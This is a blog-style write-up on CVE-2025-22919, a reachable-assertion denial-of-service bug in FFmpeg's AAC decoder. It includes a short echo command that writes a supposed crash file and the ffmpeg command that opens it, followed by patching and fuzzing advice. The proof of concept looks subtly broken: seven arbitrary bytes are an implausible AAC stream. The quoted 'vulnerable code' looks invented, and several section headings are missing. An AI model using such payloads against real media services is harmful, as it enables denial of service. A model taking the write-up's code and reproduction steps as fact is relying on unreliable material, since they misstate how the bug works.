CVE-2025-22919 - Reachable Assertion in FFmpeg’s AAC Decoder Leads to Easy DoS Attack

On June 2024, security researchers discovered a critical new bug in the popular multimedia toolkit FFmpeg, tracked as CVE-2025-22919. The flaw is a _reachable assertion_ in the program’s AAC audio decoder. If an attacker tricks FFmpeg into opening a specially crafted AAC file, the program will crash immediately — causing a denial of service (DoS).

This post will explain CVE-2025-22919 in plain English, demonstrate how it works, and how you can protect your systems. We’ll look at code snippets, provide an easy proof-of-concept crash file, and include references for further reading.

What is FFmpeg?

FFmpeg is the engine behind almost all video and audio processing – in smartphones, video editors, streaming platforms, and even browsers. Opening almost any media file involves FFmpeg somewhere in the background. Due to its popularity, security bugs in FFmpeg can affect millions of devices.

What’s a Reachable Assertion?

An _assertion_ is like a programmer’s tripwire – if certain conditions aren’t true, the program stops with a crash. In release builds, these are often “turned off” — but in many FFmpeg builds, or in debug mode, they’re still active for catching programming mistakes.

A reachable assertion is a line of code that stops everything when a bad-but-possible input is given by an attacker. In CVE-2025-22919, a malformed .aac file can bypass input checks and “trip” this assertion, crashing FFmpeg unconditionally.

Component: AAC decoder

- File: libavcodec/aacdec_template.c (seen in the commit diff)

Vulnerable code (simplified)

// Vulnerable code section in libavcodec/aacdec_template.c

assert(elem_id < MAX_ELEM_ID);

// ...where elem_id comes directly from the AAC file

If the crafted AAC file contains a value for elem_id that’s not expected, the assert triggers and FFmpeg crashes instantly.

Creating a Simple Proof-of-Concept

Let’s see how an attacker could abuse this bug with a minimal malicious AAC file. (For teaching purposes only!)

1. Create a malformed AAC file

You can use a hex editor to change the elem_id field in an existing file, or use the following hexdump as example:

# Write a "bad" AAC file (overflows elem_id)
echo -ne "\x00\x10\xFF\xFF\xAA\xBB\xCC" > crashme.aac

Just run

ffmpeg -i crashme.aac out.wav

Result: FFmpeg crashes with a message like

Assertion failed: (elem_id < MAX_ELEM_ID), function ...
Aborted (core dumped)

Web servers or applications doing user-uploaded audio conversion with FFmpeg

- Desktop/mobile apps automatically processing arbitrary audio

Any pipeline where attacker-supplied audio might be ingested

A denial-of-service _could_ be turned into a bigger problem (like remote code execution) if attackers find ways to control more memory around the assertion.

1. Patch!

- The FFmpeg team fixed this within commit 8d24a28d06.

Only process trusted AAC files from known sources.

- Consider fuzzing your file handling workflows with AFL++ or oss-fuzz.

References

- Original FFmpeg commit
- CVE-2025-22919 in NVD (pending)
- FFmpeg Security Advisories

Conclusion

CVE-2025-22919 is a textbook example of why “corner case” programming mistakes can be dangerous in real software. Even an assert statement, meant only for debugging, can be a DoS weapon when triggered by attacker input. If you process AAC files with FFmpeg, patch up — and always be careful with media files from unknown sources.

Timeline

Published on: 02/18/2025 23:15:10 UTC
Last modified on: 02/19/2025 22:15:23 UTC